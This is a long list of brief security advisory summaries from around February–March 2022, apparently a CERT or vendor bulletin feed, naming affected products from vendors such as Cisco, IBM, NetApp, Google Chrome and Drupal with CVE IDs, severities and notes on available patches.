Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The products affected
with critical vulnerabilities are PHP versions 7.4.x prior to 7.4.28, 8.0.x prior to 8.0.16,
and 8.1.x prior to 8.1.3 & NPM url-parse versions prior to 1.5.9. CVE ID: CVE-2021-21708 (Critical), CVE-2022-0686 (Critical), CVE-2022-0691 (Critical)
Sophos has released workaround & remediation to resolve an authentication bypass
vulnerability in the User Portal and Webadmin of its Firewall. The affected products are
Sophos Firewall v18.5 MR3 (18.5.3) and older. CVE ID: CVE-2022-1040 (Critical)
Red Hat has released security updates to address multiple vulnerabilities in OpenShift
GitOps 1.4. CVE ID: CVE-2022-1025, CVE-2022-24730 (High), CVE-2022-24731 (Medium)
SonicWall has released security updates to address a stack-based buffer overflow
vulnerability in SonicOS HTTP version via HTTP request that allows a remote unauthenticated
attacker to cause Denial of Service (DoS) or potentially results in code execution in the
firewall. The affected versions are SonicOS Gen 6 and Gen 7 firmware versions. CVE ID: CVE-2022-22274 (Critical)
mySCADA has released security updates to address command injection vulnerability in
mySCADA's myPRO. Successful exploitation of this vulnerability can allow arbitrary operating
system commands injection.
CVE ID: CVE-2022-0999 (High)
Yokogawa has released security updates to address multiple vulnerabilities in its CENTUM and
Exaopc equipment's. Successful exploitation can suppress the alarms, read or write files,
crash the server or execute arbitrary code.
CVE ID: CVE-2022-21194 (High), CVE-2022-23402 (High), CVE-2022-21808 (High),
CVE-2022-22729 (High), CVE-2022-22151 (Medium), CVE-2022-21177 (Medium), CVE-2022-22145
(Medium), CVE-2022-22148 (High), CVE-2022-22141 (Medium), CVE-2022-23401 (High)
Google has released security update for Chrome Beta 100 (100.0.4896.56) for Android, Beta
channel 100.0.4896.54 (Platform version: 14526.43.0) for most Chrome OS devices and Beta
channel 100.0.4896.56 for Mac, Windows and Linux.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2021-4090 (High), CVE-2022-23235 (Low)
Debian has released security update to address a vulnerability in php-twig that allow a
malicious user to execute arbitrary code.
CVE ID: CVE-2022-23614 (Critical)
VMware has released security updates to resolve OS command injection and file upload
vulnerabilities in VMware Carbon Black App Control which can cause Remote Code Execution
(RCE). CVE ID: CVE-2022-22951 (Critical), CVE-2022-22952 (Critical)
Cisco has released security updates to address a vulnerability in Cisco NX-OS Software for
Cisco Nexus 9000 Series Switches which can cause dropping of Bidirectional Forwarding
Detection (BFD) traffic on an affected device. CVE ID: CVE-2022-20623 (High)
A privilege escalation vulnerability and unsupported vulnerability have been discovered in
Drupal project, Role Delegation module & Colorbox Node respectively. The update for
Drupal project Role Delegation module is available.
Google has released security update for Dev channel 101.0.4951.6 (Platform version:
14588.11.0) for most Chrome OS devices and Dev channel 101.0.4951.7 for Windows, Linux and
Mac.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Multiple vulnerabilities have been discovered in Python, Apache HTTP Server, and OpenSSL
that affects NetApp products. An attacker can exploit these vulnerabilities to take control
of an affected system. Updates are available for some products. CVE ID: CVE-2022-0391 (High), CVE-2022-0778 (High), CVE-2022-22719 (High),
CVE-2022-22720 (Critical), CVE-2022-22721 (Critical), CVE-2022-23943 (Critical)
Delta Electronics has released security updates for DIAEnergie to resolve multiple
vulnerabilities. Successful exploitation of these vulnerabilities can allow an attacker to
retrieve passwords in cleartext, remotely execute code, cause a user to carry out an action
unintentionally, or log in and use the device with administrative privileges.
CVE ID: CVE-2021-33003 (Medium), CVE-2021-32967 (Critical), CVE-2021-32983
(Critical), CVE-2021-38390 (Critical), CVE-2021-38391 (Critical), CVE-2021-38393 (Critical),
CVE-2021-32991 (Medium), CVE-2021-23228 (High), CVE-2021-44544 (High), CVE-2021-31558
(Medium), CVE-2021-44471 (High), CVE-2022-0988 (High)
McAfee has released security updates to address multiple vulnerabilities in ePolicy
Orchestrator (ePO). This release addresses one blind SQL injection vulnerability in ePO and
updates three libraries (Java, Apache HTTP Server, and Tomcat) used by ePO.
CVE ID: CVE-2022-0842 (Medium), CVE-2022-0857 (Medium), CVE-2022-0858 (Medium),
CVE-2022-0859 (Medium), CVE-2022-0861 (Low), CVE-2022-0862 (Low), CVE-2021-42340 (Medium),
CVE-2021-34798 (High), CVE-2020-13938 (Medium)
Google has released security update for Dev channel 101.0.4943.0 (Platform version:
14583.0.0) for most Chrome OS devices, and Stable channel 99.0.4844.86 (Platform version:
14469.58.0) for most Chrome OS devices.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Juniper Networks has released security update to address multiple vulnerabilities in Junos
Space. These vulnerabilities affect Junos Space versions prior to 21.1R1.
Multiple vulnerabilities have been discovered in Mitsubishi Electrics products due to design
flaws in the frame fragmentation functionality and the frame aggregation functionality in
Wireless Communication Standards IEEE 802.11. These vulnerabilities can allow an attacker to
steal communication contents or inject unauthorized packets. Workarounds are available.
CVE ID: CVE-2020-24586 (Low), CVE-2020-24587 (Low), CVE-2020-24588 (Low),
CVE-2020-26139 (Medium), CVE-2020-26140 (Medium), CVE-2020-26142 (High), CVE-2020-26143
(Medium), CVE-2020-26144 (Medium), CVE-2020-26145 (Medium), CVE-2020-26146 (Medium),
CVE-2020-26147 (Medium)
HP has released security updates to address information disclosure, denial of service, and
buffer overflow vulnerabilities in HP Print devices.
CVE ID: CVE-2022-24291 (High), CVE-2022-24292 (Critical), CVE-2022-24293 (Critical)
Debian has released security updates to address multiple vulnerabilities in Thunderbird,
which can result in the execution of arbitrary code or information disclosure.
CVE ID: CVE-2022-26381, CVE-2022-26383, CVE-2022-26384, CVE-2022-26386,
CVE-2022-26387
Drupal uses third-party Guzzle library for handling HTTP requests and responses to external
services. Guzzle has released security update which affects some Drupal sites.
CVE ID: CVE-2022-24775 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Western Digital has released security updates to address directory traversal vulnerability
in EdgeRover that allows an attacker to carry out a local privilege escalation and escape
basic file-system sandboxing.
CVE ID: CVE-2022-22988 (Critical)
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
Multiple vulnerabilities have been discovered in FANUC Robot Controllers. Successful
exploitation can cause system software to stop working correctly due to data corruption.
CVE ID: CVE-2021-32996, CVE-2021-32998
NVIDIA has released security update for NVIDIA Data Center GPU Manager (DCGM) to address
vulnerability in nvhostengine that can lead to code execution, Denial of Service (DoS) and
escalation of privileges.
CVE ID: CVE-2022-21820 (Medium)
Johnson Controls has released security updates to address a vulnerability impacting Metasys
ADS/ADX/OAS Servers with the MUI feature. An authenticated attacker can inject malicious
code into the MUI PDF export feature.
CVE ID: CVE‐2021‐36202
Google has released security update for Chrome Beta 100 (100.0.4896.46) for Android, Beta
channel 100.0.4896.44 (Platform version: 14526.28.0) for most Chrome OS devices, Beta
channel 100.0.4896.45 for Mac and 100.0.4896.45 for Windows and Linux.
CKEditor library is used for WYSIWYG editing in Drupal projects. CKEditor has released
security update that impacts Drupal.
CVE ID: CVE-2022-24728, CVE-2022-24729
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Security updates have been released for BIND to address multiple vulnerabilities.
CVE ID: CVE-2022-0667 (High), CVE-2022-0635 (High), CVE-2022-0396 (Medium),
CVE-2021-25220 (Medium)
Multiple vulnerabilities such as Stack-based buffer overflow, and Insecurely loading Dynamic
Link Libraries have been discovered in KINGSOFT WPS Office and KINGSOFT Internet Security.
The affected products are no longer supported, and developer recommends to use alternative
unaffected products.
CVE ID: CVE-2022-2594 (High), CVE-2022-26081 (High), CVE-2022-25969 (High),
CVE-2022-26511 (High)
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
A vulnerability has been discovered in CRI-O container engine for Kubernetes. This
vulnerability, dubbed cr8escape, can allow an attacker to escape from a Kubernetes container
and gain root access to the host and enable to move anywhere in the cluster. The security
patch is available.
CVE ID: CVE-2022-0811 (High)
ASEA Brown Boveri (ABB) has released security update to address Execution with Unnecessary
Privileges vulnerability in OPC Server for AC 800M. Successful exploitation of this
vulnerability can allow a low privileged authenticated user to remotely execute arbitrary
code.
CVE ID: CVE-2021-22284 (High)
Apple has released security updates to address vulnerabilities in Safari. An attacker can
exploit these vulnerabilities to take control of an affected device.
CVE ID: CVE-2022-22654, CVE-2022-22610, CVE-2022-22624, CVE-2022-22628,
CVE-2022-22629, CVE-2022-22637
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Google has released security update for Dev channel 101.0.4937.0 (Platform version:
14574.0.0) for most Chrome OS devices, Chrome 99 (99.0.4844.78) for Android, Extended Stable
channel has been updated to 98.0.4758.132 for Windows and Mac, Stable channel has been
updated to 99.0.4844.74 for Windows, Mac and Linux, and LTS channel has been updated to
96.0.4664.202 (Platform Version: 14268.77.0) for most ChromeOS devices.
CVE ID: CVE-2022-0971 (Critical)
Apache has released security updates for Apache HTTP Server to resolve multiple
vulnerabilities.
CVE ID: CVE-2022-22719, CVE-2022-22720, CVE-2022-22721, CVE-2022-23943
Dell has released security update to resolve multiple vulnerabilities in third-party
Components of Dell EMC Policy Manager, DELL EMC Secure Connect Gateway and Dell BSAFE SSL-J.
A Remote Code Execution (RCE) vulnerability has been discovered in Veeam Backup &
Replication which allow executing malicious code remotely without authentication. The
patches have been released for Veeam Backup & Replication versions 10 and 11 only.
CVE ID: CVE-2022-26500 (Critical), CVE-2022-26501 (Critical)
A Local Privilege Escalation (LPE) vulnerability has been discovered in QNAP NAS which
allows an unprivileged user to gain administrator privileges and inject malicious code. The
affected products are all QNAP x86-based NAS and QNAP ARM-based NAS running QTS 5.0.x and
QuTS hero h5.0.x.
CVE ID: CVE-2022-0847 (High)
A post authentication OS command injection vulnerability has been discovered in SonicWall's
Secure Remote Access (SRA) series products and Secure Mobile Access (SMA) 100 series
products. The updates are available for SMA100 Series products and no update has been
released for End of Life (EoL) products SRA Series version 9.0.0.5-19sv and earlier.
CVE ID: CVE-2022-22273 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Parse Server has released security update to resolve a remote code execution (RCE)
vulnerability. This vulnerability affects Parse Server in the default configuration with
MongoDB.
CVE ID: CVE-2022-24760 (Critical)
Dell has released security update to address multiple vulnerabilities in Dell PowerScale
OneFS that can potentially be exploited by malicious users to compromise the affected
system.
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
ASUS has released MyASUS version 3.1.2.0 for ASUS laptops and desktop PCs which contains
important security updates, including fixes for the CVE-2022-22814 vulnerability.
CVE ID: CVE-2022-22814 (Critical)
A privilege escalation vulnerability (AKA Dirty Pipe) has been discovered in Linux Kernel
due to improper initialisation in new pipe buffer structure.
CVE ID: CVE-2022-0847 (High)
Debian has released security updates to resolve XML parsing vulnerabilities in the Tryton
application platform which can cause information disclosure or Denial of Service (DoS).
CVE ID: CVE-2022-26661, CVE-2022-26662
An authentication bypass vulnerability has been discovered in NETGEAR DGND3700v2. NETGEAR
will not release a fix for this vulnerability on the affected product as it is outside of
the security support period.
Dell has released security updates for Dell Client Consumer and Commercial platform to
address multiple SMM vulnerabilities that can potentially be exploited by malicious users to
compromise the affected system.
CVE ID: CVE-2022-24415 (High), CVE-2022-24416 (High), CVE-2022-24419 (High),
CVE-2022-24420 (High), CVE-2022-24421 (High)
Google has released security update for Chrome Beta 100 (100.0.4896.30) for Android, Beta
channel 100.0.4896.30 for Mac, Windows and Linux, Chrome Beta 100 (100.0.4896.28) for iOS,
Dev channel 101.0.4928.0 (Platform version: 14553.0.0) for most Chrome OS devices and Dev
channel 101.0.4929.5 for Windows, Linux and Mac.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Drupal has released security updates to address access bypass and Cross Site Scripting
vulnerabilities in Opigno Learning path and SVG Formatter module respectively.
Palo Alto Networks has released security updates for PAN-OS software and GlobalProtect app
to resolve use of a weak cryptographic algorithm and privilege escalation vulnerabilities
respectively.
CVE ID: CVE-2022-0016 (High), CVE-2022-0022 (Medium)
Schneider Electric has released mitigations to resolve multiple vulnerabilities in
EcoStruxure Control Expert, EcoStruxure Process Expert and SCADAPack RemoteConnect for x70,
third party components used in AT&T Labs’ Compressor (XMilI) and decompressor (XDemill).
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
WPS Office for Windows v11.2.0.10258 has been released to resolve privilege escalation
vulnerability in earlier versions.
CVE ID: CVE-2022-25943 (High)
Rust has released security update for Regex Crate to address a vulnerability that left
applications open to Denial of Service (DoS) attacks.
CVE ID: CVE-2022-24713 (High)
Microsoft has released security update to resolve Remote Code Execution (RCE) vulnerability
in Microsoft Exchange Server. An attacker can exploit this vulnerability to take control of
an affected system. The affected products are Microsoft Exchange Server 2019, Microsoft
Exchange Server 2016 and Microsoft Exchange Server 2013.
CVE ID: CVE-2022-23277 (High)
Citrix has released security update to address vulnerability in AMD CPU hardware that may
allow code in a guest VM to infer the value of in-memory data in other guest VMs.
CVE ID: CVE-2021-26401
NVIDIA has released security update in NVIDIA JetPack Software Development Kit (SDK) to
resolve Denial of Service (DoS), escalation of privileges and impact to data integrity and
confidentiality vulnerabilities for its multiple products.
CVE ID: CVE‑2021‑34401 (High), CVE‑2021‑4034 (High), CVE‑2022‑21819 (High)
Hitachi Energy has released security update to address multiple vulnerabilities in
Open-Source Software components that are used in the RelCare Cloud and OnPrem versions.
CVE ID: CVE-2020-1967 (High), CVE-2021-3156 (High), CVE-2021-3449 (Medium),
CVE-2021-3450 (High), CVE-2021-27432 (High), CVE-2021-27434 (High), CVE-2021-28041 (High)
Microsoft has released updates to address multiple vulnerabilities in its software. A remote
attacker can exploit some of these vulnerabilities to take control of an affected system.
Mozilla has released security updates to address multiple vulnerabilities in Firefox and
Firefox ESR. An attacker can exploit these vulnerabilities to take control of an affected
system.
AVEVA has released security updates to address cleartext storage of sensitive information in
memory vulnerability in AVEVA's System Platform.
CVE ID: CVE-2022-0835 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
Wordfence has released security updates to resolve arbitrary file upload and stored
Cross-Site Scripting (XSS) vulnerabilities in Ninja Forms File Uploads Extension WordPress
plugin.
CVE ID: CVE-2022-0888 (Critical), CVE-2022-0889 (High)
SAP has released security updates to address vulnerabilities affecting multiple products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Cisco has released security updates to address several vulnerabilities in Cisco Application
Policy Infrastructure Controller (APIC). An attacker can exploit these vulnerabilities to
take control of an affected system.
CVE ID: CVE-2021-1577 (Critical), CVE-2021-1579 (High), CVE-2021-1580 (Medium),
CVE-2021-1581 (Medium)
Multiple vulnerabilities such as escalation of privilege and information disclosure have
been discovered in Intel Trace Hub and Intel Processors respectively.
CVE ID: CVE-2021-33150 (Medium), CVE-2022-0001 (Medium), CVE-2022-0002 (Medium)
Proofpoint has released security update to resolve arbitrary code execution vulnerability in
Proofpoint Insider Threat Management (ITM) Agent for Windows.
CVE ID: CVE-2022-25294 (High)
Security update has been released to address a vulnerability in the Linux kernel version 5.8
which allows overwriting data in arbitrary read-only files. The vulnerability has been fixed
in Linux 5.16.11, 5.15.25 and 5.10.102.
Multiple vulnerabilities have been discovered in Axeda agent, and Axeda Desktop Server for
Windows.
CVE ID: CVE-2022-25246 (Critical), CVE-2022-25247 (Critical), CVE-2022-25248
(Medium), CVE-2022-25249 (High), CVE-2022-25250 (High), CVE-2022-25251 (Critical),
CVE-2022-25252 (High)
Johnson Controls has released security update to address Log4J Remote Code Execution (RCE)
vulnerability in PowerManage versions 4.0 to 4.8.
CVE ID: CVE-2021-44228 (Critical)
Mozilla has released security updates to address vulnerabilities in Firefox, Firefox ESR,
Firefox for Android, Focus, and Thunderbird. An attacker can exploit these vulnerabilities
to take control of an affected system.
CVE ID: CVE-2022-26485 (Critical), CVE-2022-26486 (Critical)
Asterix has released security updates to address out of bounds memory access, Denial of
Service (DoS) and arbitrary code execution vulnerabilities in multiple Asterix products.
OMRON CX-Programmer has released security updates to resolve multiple vulnerabilities in
CX-Programmer v9.76.1 and earlier versions which is a part of CX-One (v4.60) suite.
CVE ID: CVE-2022-21124 (High), CVE-2022-25230 (High), CVE-2022-25325 (High),
CVE-2022-21219 (High), CVE-2022-25234 (High)
Digital Arts Inc. has released security update to resolve improper check for certificate
revocation vulnerability in i-FILTER. A Man-in-the-Middle (MITM) attack may allow an
adversary to eavesdrop on an encrypted communication.
CVE ID: CVE-2022-21170 (Medium)
Missing authentication for critical function and improper protection against electromagnetic
fault injection have been discovered in Power Line Communications J2497 (a.k.a. PLC4TRUCKS).
Successful exploitation can allow a nearby attacker to execute diagnostic functions in the
trailer or light the trailer ABS fault telltale in a tractor.
CVE ID: CVE-2022-26131 (Critical), CVE-2022-25922 (Medium)
Use of hard-coded credentials vulnerability has been discovered in Becton, Dickinson and
Company's Equipment- Viper LT. Successful exploitation of this vulnerability can allow an
attacker to access, modify, or delete sensitive information.
CVE ID: CVE-2022-22765 (High)
Use of hard-coded credentials vulnerability has been discovered in Becton, Dickinson and
Company's Equipment- Pyxis. Successful exploitation can allow an attacker to gain access to
electronic Protected Health Information (ePHI) or other sensitive information.
CVE ID: CVE-2022-22766 (High)
IPCOMM has released security update to address Cross-Site Scripting (XSS) and code injection
vulnerability in it's equipment- ipDIO. Successful exploitation can allow an attacker to
inject and execute arbitrary code. As ipDIO considered an end-of-life product, IPCOMM
recommends upgrading to its ip4Cloud device.
CVE ID: CVE-2022-24432 (Medium), CVE-2022-21146 (Medium), CVE-2022-24915 (High),
CVE-2022-22985 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Google Chrome has released updated Chrome Beta 100 (100.0.4896.18) for Android, Beta channel
100.0.4896.20 for Windows, Mac and Linux , Dev channel 101.0.4918.0 (Platform version:
14543.0.0) for most Chrome OS devices and Dev channel 101.0.4919.0 for Windows, Linux and
Mac desktop.
Dell has released security update to address multiple vulnerabilities in Dell EMC Integrated
System for Microsoft Azure Stack Hub which can potentially be exploited by malicious users
to compromise the affected system. The affected versions are Dell EMC 2112 and earlier.
Debian has released security updates to address request smuggling attack vulnerability in
Varnish.
CVE ID: CVE-2022-23959 (Critical), CVE-2021-36740 (Medium)
Solarwinds has released security update for Serv-U to address a directory transversal
vulnerability. This vulnerability can allow access to files relating to the Serv-U
installation and server files.
CVE ID: CVE-2021-35250 (High)
GitLab has released Community Edition and Enterprise Edition version 14.6.6 to resolve a
number of regressions and bugs in 14.6 release and prior versions.
A Cross-Site Scripting (XSS) vulnerability due to insufficient escaping and sanitization has
been discovered in Amelia WordPress plugin. The affected versions are Amelia versions up to
and including 1.0.46. The updated version 1.0.47 is available.
CVE ID: CVE-2022-0834 (High)
Dell has released security update to resolve multiple vulnerabilities in Dell EMC NetWorker
vProxy. The affected versions are Dell EMC NetWorker vProxy 4.3.0-15 and earlier.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Cisco has released security updates to address several vulnerabilities in multiple Cisco
products. The affected products are Cisco Expressway Series & Cisco TelePresence VCS,
Cisco Ultra Cloud Core SMI, Cisco ISE configured with RADIUS authentication services and CLI
of Cisco StarOS.
CVE ID: CVE-2022-20754 (Critical), CVE-2022-20755 (Critical), CVE-2022-20762 (High),
CVE-2022-20756 (High), CVE-2022-20665 (Medium)
TerraMaster has released security update to fix security vulnerability related to the
Deadbolt ransomware attack in TerraMaster Operating Systems TOS 4.2.30 (ARM) and TOS 4.2.30
(X86).
VMware has released security update to resolve an uncontrolled search path vulnerability in
VMware Tools for Windows. The affected versions are VMware Tools for Windows versions 11.x.y
and 10.x.y. The updated version 12.0.0 is available.
CVE ID: CVE-2022-22943 (Medium)
Google Chrome has released updated version Chrome 99 (99.0.4844.48) for Android, Chrome 99
(99.0.4844.47) for iOS, Extended Stable channel 98.0.4758.119 for Windows & Mac and
Stable channel 99.0.4844.51 for Windows, Mac & Linux.
Cisco has released security update to address vulnerability in the Cisco Discovery Protocol
service of Cisco FXOS Software and Cisco NX-OS Software. Successful exploitation can cause
Denial of Service (DoS) condition by sending a series of malicious Cisco Discovery Protocol
messages to an affected device.
CVE ID: CVE-2022-20625 (Medium)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
PJSIP- multimedia communication library has released version 2.12 to resolve multiple
vulnerabilities in its previous versions.
CVE ID: CVE-2021-43299 (High), CVE-2021-43300 (High), CVE-2021-43301 (High),
CVE-2021-43302 (Medium), CVE-2021-43303 (Medium)
Multiple vulnerabilities have been discovered in several Fortinet products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-22301 (High), CVE-2022-22300 (Low), CVE-2021-36166 (Critical),
CVE-2022-22303 (Low), CVE-2020-15936 (Low), CVE-2021-36171 (High), CVE-2021-44166 (Low),
CVE-2021-43070 (Medium), CVE-2021-43077 (High), CVE-2021-43075 (High)
SUSE has released security updates to resolve multiple vulnerabilities in php72.
CVE ID: CVE-2015-9253 (Medium), CVE-2017-8923 (Critical), CVE-2021-21707 (Medium)
Cisco has released security updates to resolve Denial of Service (DoS) vulnerability in the
DNS-based Authentication of Named Entities (DANE) email verification component of Cisco
AsyncOS Software for Cisco Email Security Appliance (ESA).
CVE ID: CVE-2022-20653 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Red Hat has released security update to resolve path traversal and dereference of symlinks
vulnerability in OpenShift GitOps 1.3 on OCP 4.7-4.9.
CVE ID: CVE-2022-24348 (High)
It has been discovered that GE's equipment- Proficy CIMPLICITY all versions are vulnerable
due to cleartext transmission of sensitive information. Successful exploitation can allow an
attacker to capture a connection session, resulting in disclosure of sensitive information.
CVE ID: CVE-2022-21798 (High)
It has been discovered that Visual Voice Mail (VVM) services transmit unencrypted
credentials via SMS. An attacker with the ability to read SMS messages can obtain VVM IMAP
credentials and gain access to VVM data.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
ASUSTOR NAS (Network-Attached Storage) has released security updates to resolve several
security issues for its products. ASUSTOR NAS has also released guideline to mitigate
ransomware and malware risks.
Juniper Networks has released security update to resolve stack-based buffer overflow and
improper locking vulnerabilities in MX series and SRX series of Junos OS.
CVE ID: CVE-2022-22175 (High), CVE-2022-22178 (High)
Multiple vulnerabilities have been discovered in FATEK Automation's Equipment- FvDesigner.
Successful exploitation can cause arbitrary code execution.
CVE ID: CVE-2022-25170 (High), CVE-2022-23985 (High), CVE-2022-21209 (High)
Bently Nevada has released security update to resolve an use of password hash with
insufficient computational effort vulnerability in Bently Nevada's 3500 equipment.
CVE ID: CVE-2021-32997 (High)
VMware has released security update to resolve a stored Cross-Site Scripting (XSS)
vulnerability affecting its Workspace ONE Boxer product.
CVE ID: CVE-2022-22944 (Medium)
Trend Micro has released critical patches to resolve vulnerabilities related to a static
credential, integer overflow and Denial of Service (DoS) for Trend Micro ServerProtect.
CVE ID: CVE-2022-25329 (Critical), CVE-2022-25330 (High), CVE-2022-25331 (Medium)
Cisco has released security updates to address several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20623 (High), CVE-2022-20650 (High), CVE-2022-20624 (High),
CVE-2021-1586 (High), CVE-2022-20625 (Medium)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
A Remote Code Execution (RCE) vulnerability has been discovered in the Oracle Talent
Acquisition Cloud - Taleo Enterprise Edition which can cause a partial Denial of Service
(partial DOS).
CVE ID: CVE-2021-35689 (Critical)
GE has released security update to resolve an improper privilege management vulnerability in
Proficy CIMPLICITY equipment.
CVE ID: CVE-2022-23921 (High)
It has been discovered that the backend infrastructure shared by multiple mobile device
monitoring services does not adequately authenticate or authorize API requests, creating an
IDOR (Insecure Direct Object Reference) vulnerability. These services and their associated
apps can be used to perform non-consensual, unauthorized monitoring and are commonly called
"stalkerware."
Android has released security bulletin to address multiple vulnerabilities affecting several
Android devices. Android 12L devices with security patch levels of 2022-03-01 or later are
protected against these issues.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
Multiple vulnerabilities have been discovered in Expat, an XML parsing C library, which can
result in denial of service or potentially the execution of arbitrary code, if a malformed
XML file is processed. It is recommended to upgrade the expat packages.
CVE ID: CVE-2022-25235, CVE-2022-25236, CVE-2022-25313, CVE-2022-25314,
CVE-2022-25315
Multiple vulnerabilities have been discovered in Insyde BIOS that affects Siemens' products.
An attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-24030 (Critical), CVE-2021-45971 (Critical), CVE-2021-45970
(Critical), CVE-2021-45969 (Critical), CVE-2021-42554 (Critical)
Insyde has released security update to address multiple vulnerabilities in InsydeH2O
products.
CVE ID: CVE-2021-43613 (Medium), CVE-2021-43614 (Medium), CVE-2021-38489 (High)
Dell has released security update for Dell EMC Integrated Data Protection Appliance
(PowerProtect DP Series) for multiple vulnerabilities that can be exploited by malicious
users to compromise the affected system.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
Debian has released security update to resolve multiple vulnerabilities in webkit2gtk and
wpewebkit.
CVE ID: CVE-2022-22589, CVE-2022-22590, CVE-2022-22592, CVE-2022-22620
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
WordPress has released version 5.0.9 to resolve a Cross-Site Scripting (XSS) vulnerability
due to insufficient escaping and sanitization of the settings parameter in Essential Addons
for Elementor Lite WordPress plugin. The affected versions are Essential Addons for
Elementor Lite versions up to and including 5.0.8.
CVE ID: CVE-2022-0683 (Medium)
Cisco has released security updates to address vulnerability in Cisco IOS XR software which
allow an authenticated, remote attacker to overwrite and read arbitrary files on the local
device.
CVE ID: CVE-2021-34718 (High)
Juniper Networks has released security update to resolve an allocation of resources without
limits or throttling vulnerability for all versions of Junos OS used in MX Series with SPC3,
SRX Series.
CVE ID: CVE-2022-22153 (High)
Multiple vulnerabilities such as Cross-Site Scripting (XSS), template injection and
authentication bypass have been discovered in a-blog cms. It is recommended to update the
a-blog cms software to the latest version.
CVE ID: CVE-2022-24374 (Medium), CVE-2022-23916 (Medium), CVE-2022-23810 (Medium),
CVE-2022-21142 (Medium)
Cisco has released security updates to address a command injection vulnerability in the CLI
of Cisco IOS XE SD-WAN software which allow an authenticated, local attacker to execute
arbitrary commands with root privileges.
CVE ID: CVE-2021-1529 (High)
A Cross-Site Scripting vulnerability due to insufficient escaping and sanitization of IP
parameter, platform parameter & current_page_id parameter has been discovered in WP
Statistics WordPress plugin. The affected versions are WP Statistics versions up to and
including 13.1.5. The updated version 13.1.6 is available.
CVE ID: CVE-2022-25305 (High), CVE-2022-25306 (High), CVE-2022-25307 (High)
Google Chrome has released Stable channel updated version 98.0.4758.107 (Platform version:
14388.61.0) for most Chrome OS devices, Dev channel 100.0.4892.0 for Windows, Linux and Mac,
and Beta 99 (99.0.4844.36) for iOS to resolve multiple vulnerabilities.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
Moxa has released security updates to resolve vulnerability which can cause
Man-In-The-Middle (MITM) attack in Moxa’s MGate MB3170/MB3270/MB3280/MB3480 Series Protocol
Gateways.
Debian has released security update to address code execution vulnerability in zsh package,
a powerful shell and scripting language.
CVE ID: CVE-2021-45444
Cisco has released security updates to address several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20653 (High), CVE-2022-20750 (Medium), CVE-2022-20659 (Medium)
Drupal has released security update to address information disclosure and improper input
validation vulnerabilities in Quick Edit module and Drupal core's form API respectively.
CVE ID: CVE-2022-25270, CVE-2022-25271
Google Chrome has released updated version Beta 99 (99.0.4844.35) for Android, Beta channel
99.0.4844.33 (Platform version: 14469.24.0) for most Chrome OS devices, Beta channel for
Desktop 99.0.4844.35 for Mac, Windows and Linux and LTC-96 to 96.0.4664.194 (Platform
Version: 14268.73.0) for most ChromeOS devices to resolve multiple vulnerabilities.
CVE ID: CVE-2022-0099 (High), CVE-2022-0308 (Medium), CVE-2022-0453 (High),
CVE-2022-0456 (High), CVE-2022-0460 (Medium), CVE-2022-0465 (Medium), CVE-2022-0603 (High),
